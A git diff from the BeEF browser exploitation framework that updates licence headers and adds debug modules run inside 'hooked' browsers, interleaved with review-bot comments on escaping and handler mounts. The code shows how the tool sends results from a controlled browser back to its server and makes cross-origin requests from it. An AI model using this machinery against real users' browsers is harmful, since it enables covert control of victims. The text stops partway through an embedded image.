 var message = "<%= @message %>";
diff --git a/modules/chrome_extensions/send_gvoice_sms/config.yaml b/modules/chrome_extensions/send_gvoice_sms/config.yaml
index e8e99a730..07e32b8e9 100755
--- a/modules/chrome_extensions/send_gvoice_sms/config.yaml
+++ b/modules/chrome_extensions/send_gvoice_sms/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/chrome_extensions/send_gvoice_sms/module.rb b/modules/chrome_extensions/send_gvoice_sms/module.rb
index a692f861c..99eea8418 100755
--- a/modules/chrome_extensions/send_gvoice_sms/module.rb
+++ b/modules/chrome_extensions/send_gvoice_sms/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Send_gvoice_sms < BeEF::Core::Command
diff --git a/modules/debug/test_beef_debug/command.js b/modules/debug/test_beef_debug/command.js
new file mode 100644
index 000000000..4737ae211
--- /dev/null
+++ b/modules/debug/test_beef_debug/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ try {
+ var msg = "<%= @msg.gsub(/"/, '\\"') %>";
+ beef.debug(msg);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
+ } catch(e) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
+ }
+
+});
diff --git a/modules/debug/test_beef_debug/config.yaml b/modules/debug/test_beef_debug/config.yaml
new file mode 100644
index 000000000..f077e3b4f
--- /dev/null
+++ b/modules/debug/test_beef_debug/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ test_beef_debug:
+ enable: true
+ category: "Debug"
+ name: "Test beef.debug()"
+ description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
+ authors: ["bcoles"]
+ target:
+ working: ["All"]
+ not_working: ["IE"]
diff --git a/modules/debug/test_beef_debug/module.rb b/modules/debug/test_beef_debug/module.rb
new file mode 100644
index 000000000..239272875
--- /dev/null
+++ b/modules/debug/test_beef_debug/module.rb
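Review bot: The `gsub(/"/, '\\"')` on the `var msg` line of test_beef_debug/command.js escapes only double quotes, so a message containing a backslash or a newline still breaks the generated string literal — an input of `\"` becomes `\\"` in JavaScript, which is a literal backslash followed by a closing quote. The value comes from the operator's textarea rather than from the hooked page, so this is a robustness problem rather than a trust-boundary one, but it makes the module fail silently on exactly the kind of input a debug message is likely to contain. Serialise the value as JSON instead, `var msg = <%= @msg.to_json %>;`, which handles quotes, backslashes and newlines in one step; whether `json` is already loaded in the module's ERB context needs confirming.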
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_beef_debug < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+
+end
diff --git a/modules/debug/test_cors_request/command.js b/modules/debug/test_cors_request/command.js
new file mode 100644
index 000000000..8ef5044d9
--- /dev/null
+++ b/modules/debug/test_cors_request/command.js
@@ -0,0 +1,16 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var method = "<%= @method %>";
+ var url = "<%= @url %>";
+ var data = "<%= @data %>";
+
+ beef.net.cors.request(method, url, data, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); });
+
+});
+
diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml
new file mode 100644
index 000000000..ec961b554
--- /dev/null
+++ b/modules/debug/test_cors_request/config.yaml
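Review bot: In test_cors_request/command.js the `var method`, `var url` and `var data` lines interpolate operator-supplied values straight into JavaScript string literals with no escaping, so a `"`, a backslash or a newline in the URL or POST body produces a syntax error in the hooked browser and the module never reports back. The default URL in module.rb only works because it is already percent-encoded (`%27`, `%20`), which hides the problem in the default case. Encode each value as JSON instead, e.g. `var url = <%= @url.to_json %>;` and the same for `method` and `data`, so the generated literal is well-formed for any input.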
@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ test_cors_request:
+ enable: true
+ category: "Debug"
+ name: "Test CORS Request"
+ description: "Test the beef.net.cors.request function by retrieving a URL."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
+ not_working:
+ IE:
+ min_ver: 6
+ max_ver: 7
+ O:
+ min_ver: 1
+ max_ver: 11
+ C:
+ min_ver: 1
+ max_ver: 2
+ S:
+ min_ver: 1
+ max_ver: 3
diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb
new file mode 100644
index 000000000..569963dfe
--- /dev/null
+++ b/modules/debug/test_cors_request/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_cors_request < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['response'] = @datastore['response']
+ save content
+ end
+
+ def self.options
+
+ return [
+ {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
+ {'name' => 'url', 'ui_label' =>'URL', 'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
+ {'name' => 'data', 'ui_label' =>'Data', 'type' => 'text', 'width' => '400px', 'value' => 'postdata' },
+ ]
+ end
+
+end
diff --git a/modules/debug/test_http_bind_raw/command.js b/modules/debug/test_http_bind_raw/command.js
new file mode 100644
index 000000000..5339386e7
--- /dev/null
+++ b/modules/debug/test_http_bind_raw/command.js
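Review bot: `working: ["ALL"]` in test_cors_request/config.yaml differs in case from the `["All"]` used by every other debug module added in this commit; if the target matcher compares the string literally (the loader is not visible here), this module would match no browser at all. Make it `working: ["All"]` for consistency unless the loader is known to be case-insensitive. The `not_working` version ranges for IE, O, C and S also carry no explanation; a short comment such as `# browser versions without CORS / XMLHttpRequest Level 2 support` (assuming that is the reason) would spare the next reader a guess.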
@@ -0,0 +1,11 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /beef');
+
+});
diff --git a/modules/debug/test_http_bind_raw/config.yaml b/modules/debug/test_http_bind_raw/config.yaml
new file mode 100644
index 000000000..8c4561ce3
--- /dev/null
+++ b/modules/debug/test_http_bind_raw/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ test_http_bind_raw:
+ enable: true
+ category: "Debug"
+ name: "Test HTTP Bind Raw"
+ description: "Test the HTTP 'bind_raw' handler."
+ authors: ["bcoles"]
+ target:
+ working: ["All"]
diff --git a/modules/debug/test_http_bind_raw/module.rb b/modules/debug/test_http_bind_raw/module.rb
new file mode 100644
index 000000000..75d2bbb82
--- /dev/null
+++ b/modules/debug/test_http_bind_raw/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_http_bind_raw < BeEF::Core::Command
+
+ def pre_send
+ configuration = BeEF::Core::Configuration.instance
+ proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+ xss_hook_url = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
+ end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+
+end
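Review bot: `pre_send` in test_http_bind_raw/module.rb mounts `/beef` with a response header `'beef'=>xss_hook_url`, which discloses the hook URL to any client that requests that path on the BeEF server, not only to the hooked browser, and nothing ever unmounts it. If the trailing `-1` means the mount never expires (TODO confirm against bind_raw's signature), the handler stays reachable for the life of the process and is re-registered on every execution. Document this above the call, e.g. `# NOTE: mounts /beef until restart; the 'beef' header echoes the hook URL to anyone who requests it`, and prefer a finite count for a test module. Note also that the module's command.js reports 'mounted to /beef' without ever requesting the path, so the bound handler is never actually exercised.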
diff --git a/modules/debug/test_http_redirect/command.js b/modules/debug/test_http_redirect/command.js
new file mode 100644
index 000000000..c1f8d8f53
--- /dev/null
+++ b/modules/debug/test_http_redirect/command.js
@@ -0,0 +1,11 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /redirect');
+
+});
diff --git a/modules/debug/test_http_redirect/config.yaml b/modules/debug/test_http_redirect/config.yaml
new file mode 100644
index 000000000..5eaf0aa11
--- /dev/null
+++ b/modules/debug/test_http_redirect/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ test_http_redirect:
+ enable: true
+ category: "Debug"
+ name: "Test HTTP Redirect"
+ description: "Test the HTTP 'redirect' handler."
+ authors: ["bcoles"]
+ target:
+ working: ["All"]
diff --git a/modules/debug/test_http_redirect/module.rb b/modules/debug/test_http_redirect/module.rb
new file mode 100644
index 000000000..49caa7613
--- /dev/null
+++ b/modules/debug/test_http_redirect/module.rb
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_http_redirect < BeEF::Core::Command
+
+ def pre_send
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect')
+ end
+
+ def post_execute
+ content = {}
+ content['Result'] = @datastore['result']
+ save content
+ end
+
+end
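Review bot: The `result=mounted to /redirect` sent by test_http_redirect/command.js is a hard-coded string; the hooked browser never requests `/redirect`, so the module reports success whether or not `bind_redirect` in module.rb worked. Have the JS actually fetch the bound path and report what came back — `beef.net.request`, which test_network_request appears to use, looks like the right helper but its signature should be checked — or reword the result to say only that pre_send ran. The target `http://beefproject.com` is also fixed and the mount is re-registered on every run with nothing removing it; a `self.options` entry like the other debug modules, or at least a comment such as `# /redirect stays mounted after the module completes`, would make that visible.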
diff --git a/modules/debug/test_network_request/command.js b/modules/debug/test_network_request/command.js
index 1e298d835..6bc4371b4 100644
--- a/modules/debug/test_network_request/command.js
+++ b/modules/debug/test_network_request/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var scheme = "<%= @scheme %>";
diff --git a/modules/debug/test_network_request/config.yaml b/modules/debug/test_network_request/config.yaml
index f753bf17c..3d214575d 100644
--- a/modules/debug/test_network_request/config.yaml
+++ b/modules/debug/test_network_request/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb
index e4de490dd..a464ab1f2 100644
--- a/modules/debug/test_network_request/module.rb
+++ b/modules/debug/test_network_request/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Test_network_request < BeEF::Core::Command
diff --git a/modules/debug/test_return_ascii_chars/command.js b/modules/debug/test_return_ascii_chars/command.js
index e19a1ea91..03d6d1e0b 100644
--- a/modules/debug/test_return_ascii_chars/command.js
+++ b/modules/debug/test_return_ascii_chars/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var str = '';
diff --git a/modules/debug/test_return_ascii_chars/config.yaml b/modules/debug/test_return_ascii_chars/config.yaml
index 64eff01e8..60f1b7afe 100644
--- a/modules/debug/test_return_ascii_chars/config.yaml
+++ b/modules/debug/test_return_ascii_chars/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/debug/test_return_ascii_chars/module.rb b/modules/debug/test_return_ascii_chars/module.rb
index 1f4b40690..c79a986d3 100644
--- a/modules/debug/test_return_ascii_chars/module.rb
+++ b/modules/debug/test_return_ascii_chars/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Test_return_ascii_chars < BeEF::Core::Command
diff --git a/modules/debug/test_return_image/command.js b/modules/debug/test_return_image/command.js
new file mode 100644
index 000000000..788dbac2f
--- /dev/null
+++ b/modules/debug/test_return_image/command.js
@@ -0,0 +1,12 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=data:image/png;base64,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